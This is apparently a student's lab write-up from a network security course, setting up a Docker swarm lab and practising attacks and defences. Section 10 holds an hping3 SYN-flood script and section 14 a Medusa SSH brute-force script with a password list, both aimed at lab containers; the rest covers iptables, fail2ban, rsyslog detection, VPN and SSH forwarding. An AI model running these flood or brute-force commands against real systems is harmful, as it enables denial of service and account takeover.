Μάθημα: Ασφάλεια Δικτύων και Επικοινωνίων
Ονοματεπώνυμο: Χρυσούλα Κούτκου
Αριθμός Μητρώου: 71344742


1. Docker Installation (Ubuntu)

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
sudo apt update

sudo apt install -y docker-ce
 echo   "or"
sudo apt install docker*

sudo systemctl status docker
sudo usermod -aG docker username     #οπου username το όνομα του χρήστη που θα δουλεύει με docker

2. docker-compose

 sudo curl -L "https://github.com/docker/compose/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
 sudo chmod +x /usr/local/bin/docker-compose
 sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose

3. On Error:

  • run

$ sudo su
# touch set-ca.sh

  • copy-paste lines

registry_address=registry.vlabs.uniwa.gr
registry_port=5043
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt
registry_port=5080
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt

registry_address=hub.swarmlab.io
registry_port=5443
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt

registry_port=5480
mkdir -p /etc/docker/certs.d/$registry_address:$registry_port
openssl s_client -showcerts -connect $registry_address:$registry_port < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/docker/certs.d/$registry_address:$registry_port/ca.crt

3.1. exec file

sudo bash ./set-ca.sh


4. Install swarmlab-sec (Home PC)

5. Usage (swarmlab-sec)

  • Open a console

  • cd to swarmlab-sec

  • Create a directory

cd <dir>

../install/usr/share/swarmlab.io/sec/swarmlab-sec

create       create project      (swarmlab-sec create)
up           start swarmlab-sec  (swarmlab-sec up size=10)
scale        resize swarmlab-sec (swarmlab-sec scale size=30)
reload       rebuild image       (swarmlab-sec reload size=15)
login        login swarmlab-sec  (swarmlab-sec login)
exec         execute command     (swarmlab-sec exec [SHELL COMMAND])
down         stop swarmlab-sec   (swarmlab-sec down)
clean        clean project       (swarmlab-sec clean)
list         show instances      (swarmlab-sec swarmlab-sec list)
help         show help           (swarmlab-sec help)

6. Create swarmlab project

mkdir project
cd project
../install/usr/share/swarmlab.io/sec/swarmlab-sec create
Relevant files:
Project
├── Dockerfile          # Image specification
├── project             # Sample program source code
│   └── hello_world.c
├── ssh                 # keys for accessing
│   ├── id_rsa          # (could generate your own)
│   └── id_rsa.pub
├── docker-compose.yml  # Container orchestration

7. Spin up the swarmlab cluster

cd project
../install/usr/share/swarmlab.io/sec/swarmlab-sec up size=5

8. Login to the swarmlab cluster

cd project
../install/usr/share/swarmlab.io/sec/swarmlab-sec login

User password: docker

Sudo password: docker

9. Inside on Docker Master

First of all, type ifconfig to see your ip address. Then, create an inventory.yml with the IPs using nmap -sP 172.27.0.* | grep Nmap | cut -d' ' -f5-6

[service]
172.27.0.2
172.27.0.3
172.27.0.4
172.27.0.5
172.27.0.6

Afterwards, you have to create a test.yml file.

---
- hosts: service
  remote_user: docker
  gather_facts: no
  vars:
    user: "docker"

  tasks:
      # -----------------
      # make directory
      # -----------------
    - name: make dir for data
      become: true
      file:
        path: "/var/lab/playground/playground-readmongo"
        state: directory
        owner: docker
        group: docker
        mode: '0777'

#    - name: google.com
#      become: yes
#      become_user: "{{ user }}"
#      command:  curl http://www.google.com
#      ignore_errors: yes
#      register: configwww
#
#    - name: ls  configwww
#      debug: var=configwww.stdout_lines

    - name: ls -al /var/lab/playground/playground-readmongo/
      become: yes
      become_user: "{{ user }}"
      #command:  ls -al /var/lab/playground/playground-readmongo
      command:  ls -al /etc
      ignore_errors: yes
      register: config

    - name: ls  config
      debug: var=config.stdout_lines
#
#    - name: Refresh connection
#      meta: clear_host_errors

Then, create a run.sh script.

ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass

In your command line, type:

chmod +x run.sh
sudo apt install ansible
./run.sh

(Somewhere here there would be some errors)
sudo apt install sshpass

cd /etc/ansible
vi ansible.cfg
(Add this line)
host_key_checking = False
(Exit and return back)
./run.sh

10. Hping3 Attack


Here is a video about hping3, tcpdump, netstat and iptables rules. Feel free to press like button and subscribe!


Firstly, connect to the worker that you wish to do the attack. Inside the worker create a script file with these:

#!/bin/sh
#installation_of_hping3
sudo apt update
sudo apt install hping3 -y

#syn_flood_attack_with_hping3_on_docker_master_with_IP_172.27.0.2
#hping3 -i u1 -S -p 80 172.27.0.2
#hping3 172.27.0.2 -q -n -d 120 -S -p 80 --flood
hping3 -S -p 80 172.127.0.2

In your command line type:

chmod +x hping3.sh
sudo ./hping3.sh

11. Tcpdump on the victim

After connecting to the victim’s host, then create a script file tcpdump.sh

#!/bin/sh
tcpdump port 80
#tcpdump -Nnn -i any -s0 'tcp[13] & 2 !=0'

In your command line type:

chmod +x tcpdump.sh
sudo ./tcpdump.sh

12. Netstat on the victim

Create a netstat.sh script file and type the above:

#!/bin/sh

netstat -npt | awk '{print $6}' | sort | uniq -c | sort -nr | head
netstat -anp | grep 'tcp\udp' | awk '{print $6}' | cut -d: f1 | sort | uniq -c | sort -n
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -na
netstat -tna
netstat -antlupe
netstat -n -p | grep SYN_REC | wc -l
netstat -npt | awk '{print $6}' | sort | uniq -c | sort -nr | head

In your command line type:

chmod +x netstat.sh
sudo ./netstat.sh

13. Anti-Ddos protection using iptables

Create an anti-ddos.sh file and type inside:

#!/bin/sh
#drop invalid packets
iptables -A INPUT -m state --state INVALID -j DROP
iptables -A FORWARD -m state --state INVALID -j DROP
iptables -A OUTPUT -m state --state INVALID -j DROP

#Use SYNPROXY on all ports (disables connection limiting rule) ###
iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack
iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460
iptables -A INPUT -m conntrack --ctstate INVALID -j DROP

In your command line type:

chmod +x anti-ddos.sh
sudo ./anti-ddos.sh

14. SSH Brute Force Attack using Medusa


Here is a video about ssh brute force attack using medusa tool, detection using rsyslog and protection using fail2ban


In order to do this attack, you have to create a password list file. For example,

123password
root
admin-root
acbdef2147
whatistherealpassword
docker
password
123456789

The next step is to create a medusa.sh script file.

#!/bin/bash
sudo apt update
sudo apt install medusa
medusa -u docker -P pass.txt -h 172.27.0.3 -M ssh

To accomplish the ssh brute force attack I connected as worker_4 and I will attack the worker_1.

In your command line type:

chmod +x medusa.sh
sudo ./medusa.sh

15. Detection of SSH Brute Force using rsyslog tool

I will connect as worker_1 and I will create a rsyslog.sh file.

#!/bin/bash
sudo apt update
sudo apt install rsyslog
sudo service rsyslog start
sudo service rsyslog status
sudo grep "Failed password" /var/log/auth.log

In your command line type:

chmod +x rsyslog.sh
sudo ./rsyslog.sh
(After results are shown type the next line)
sudo service rsyslog stop

16. Fail2ban tool for SSH protection

Create a fail2ban.sh file and type the below:

#!/bin/bash
sudo apt update
sudo apt install fail2ban

In your command line type:

chmod +x fail2ban.sh
sudo ./fail2ban.sh
sudo service fail2ban start
sudo service fail2ban status
cd /etc/fail2ban
cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

(Inside the jail.local type the below)

[DEFAULT]
loglevel = DEBUG
logtarget = path_to_log

[sshd]
enabled = true
maxretry = 2
bantime = 600
findtime = 30
logpath = %(sshd_log)s
backend = %(sshd_backend)s
action = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s, port=ssh, protocol="%(protocol)s", chain=INPUT]

In your command line type:`

sudo service fail2ban restart
sudo service fail2ban status
sudo fail2ban-client start
sudo fail2ban-client status
sudo fail2ban-client status sshd

17. SSH Brute authentication only with keys

To accomplish this brute force login with only key you have to connect to a container, for instance I connected to worker_5.

In your command line type:`

(Our server is worker_5)

mkdir .ssh
cd .ssh
ssh-keygen
cat ~/.ssh/id_rsa.pub

(You should do the below for every worker, but for this example I will do only about worker_4)

ssh-copy-id docker@172.27.0.5

(Then it will ask you to connect)

ssh docker@172.27.0.5

(After doing this to all remaining containers type the next below for each host)

scp id_rsa docker@172.27.0.5 #copy id_rsa to every container
sudo service ssh restart

Then you have to disable password authentication on you server.

(Being on server)

cd /etc/ssh
vi sshd_config

(Inside sshd_config change the below)

PasswordAuthentication no

(After doing this return to your command line and type the below)

sudo service ssh restart

And finally you are ready!

18. VPN


Here is a video about how you can create VPN and provide services to docker swarm.


In this part, I will show you how you can create a VPN and and provide services to the docker swarm. Firstly, you shoudld be on the /swarmlab-sec/project folder and create a vpn folder.

cd swarmlab-sec/project
mkdir vpn
cd vpn

The next step is to create a create-vpn. script.

#!/bin/bash
IP=127.0.0.1                                            # Server IP
P=1194                                                  # Server Port
OVPN_SERVER='10.80.0.0/16'                              # VPN Network

#vpn_data=/var/lib/swarmlab/openvpn/openvpn-services/   # Dir to save data ** this must exist **
vpn_data=$PWD/openvpn-services/
if [ ! -d $vpn_data ]; then
 mkdir -p $vpn_data
fi

NAME=swarmlab-vpn-services                              # name of docker service
DOCKERnetwork=swarmlab-vpn-services-network             # docker network
docker=registry.vlabs.uniwa.gr:5080/myownvpn            # docker image

docker stop  $NAME					      #stop container
sleep 1
docker container rm  $NAME				#rm container

# rm config files
rm -f $vpn_data/openvpn.conf.*.bak
rm -f $vpn_data/openvpn.conf
rm -f $vpn_data/ovpn_env.sh.*.bak
rm -f $vpn_data/ovpn_env.sh

# create network
sleep 1
docker network create --attachable=true --driver=bridge --subnet=172.50.0.0/16 --gateway=172.50.0.1 $DOCKERnetwork

#run container        see ovpn_genconfig
docker run --net=none -it -v $vpn_data:/etc/openvpn  -p 1194:1194 --rm $docker ovpn_genconfig  -u udp://$IP:1194 \
-N -d -c -p "route 172.50.20.0 255.255.255.0" -e "topology subnet" -s $OVPN_SERVER

# create pki          see ovpn_initpki
docker run --net=none -v $vpn_data:/etc/openvpn  --rm -it $docker ovpn_initpki

#                     see ovpn_copy_server_files
#docker run --net=none -v $vpn_data:/etc/openvpn  --rm $docker ovpn_copy_server_files

#create vpn           see --cap-add=NET_ADMIN
sleep 1
docker run --detach --name $NAME -v $vpn_data:/etc/openvpn --net=$DOCKERnetwork --ip=172.50.0.2 -p $P:1194/udp --cap-add=NET_ADMIN $docker

sudo sysctl -w net.ipv4.ip_forward=1

#show created
docker ps

create-user.sh

USERNAME=user1
vpn_data=$PWD/openvpn-services/
docker=registry.vlabs.uniwa.gr:5080/myownvpn

docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass
docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME  > $USERNAME.user

After the user is created add in the $USERNAME.user the below:

client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60

remote-cert-tls server
remote 10.0.2.15 1194 udp #type your host IP address in every $USERNAME.user
float

rm-user.sh

#!/bin/bash

CLIENTNAME=test1
U=$CLIENTNAME

vpn_data=$PWD/openvpn-services/
docker=registry.vlabs.uniwa.gr:5080/myownvpn

rm -f $vpn_data/pki/reqs/$CLIENTNAME.req
rm -f $vpn_data/pki/private/$CLIENTNAME.key
rm -f $vpn_data/pki/issued/$CLIENTNAME.crt
rm -f $vpn_data/server/ccd/$CLIENTNAME
rm -f $vpn_data/ccd/$CLIENTNAME
pem=$(sudo grep "CN=$U$"  $vpn_data/pki/index.txt | cut  -f4)

rm -f $vpn_data/pki/certs_by_serial/$pem.pem
sed -i "/CN=$U$/d"  $vpn_data/pki/index.txt
echo $pem
docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient  $CLIENTNAME remove

rm -f $vpn_data_user_config/$CLIENTNAME.ovpn
rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn

show-user.sh

NAME=swarmlab-vpn-services                  # name of docker service
docker exec -it  $NAME ovpn_listclients

show-conn-user.sh

NAME=swarmlab-vpn-services                 # name of docker service
docker exec -it  $NAME  cat /tmp/openvpn-status.log

Then you have to type in your command line:

chmod +x create-vpn.sh
chmod +x create-user.sh
chmod +x show-user.sh
chmod +x rm-user.sh
chmod +x show-conn-user.sh

./create-vpn.sh
./create-user.sh    #for every user you have to use a different name
./show-user.sh      #you can see all the users
./show-conn-user.sh #you can see all connected users to the vpn

cp $USERNAME.user ../project    #this user will be copied to the master

After doing these steps, connect to a docker host, for instance in docker master.

sudo apt update
sudo apt install openvpn
ls -al #to check if there is the user1.user file
sudo su
service openvpn start
openvpn --config ./user1.user #client connection to the VPN

Don’t close the window or do not stop the execution. Open a new window and connect to the same user and type ifconfig to check if the tun0 has created.

Now connect to an other worker, for instance worker_1. You have to do the same thing in every worker.

ssh docker@172.27.0.3

sudo apt update
sudo apt install openvpn
touch user2.user
vi user2.user #copy the user2.user file from the /swarmlab-sec/project/vpn/ and paste it here

ls -al #to check if there is the user1.user file
sudo su
service openvpn start
openvpn --config ./user2.user #client connection to the VPN

You have to do the same procedure for the other workers.

Don’t close the window or do not stop the execution. Open a new window and connect to the same user and type ifconfig to check if the tun0 has created.

Then in docker master tab type:

sudo su
tcpdump -i tun0

Go to the new docker worker tab and type:

ping 10.80.0.2 #this is the new IP of master of tun0

You are ready!

19. REMOTE/LOCAL SSH FORWARDING


Here is a video about how you can do ssh local and remote forwarding.


On remote container

sudo apt install nginx
curl localhost #to check if localhost is working
hostname -i

On localhost host

curl localhost #to check if localhost is working
hostname
hostname -i

sudo ssh -nNT -L 80:localhost:80 docker@172.27.0.2

Then type on localhost host again in a new tab:

curl localhost #to check if localhost is working

And it works!

Please enjoy and thank you for reading my ascii doc and watching my youtube videos!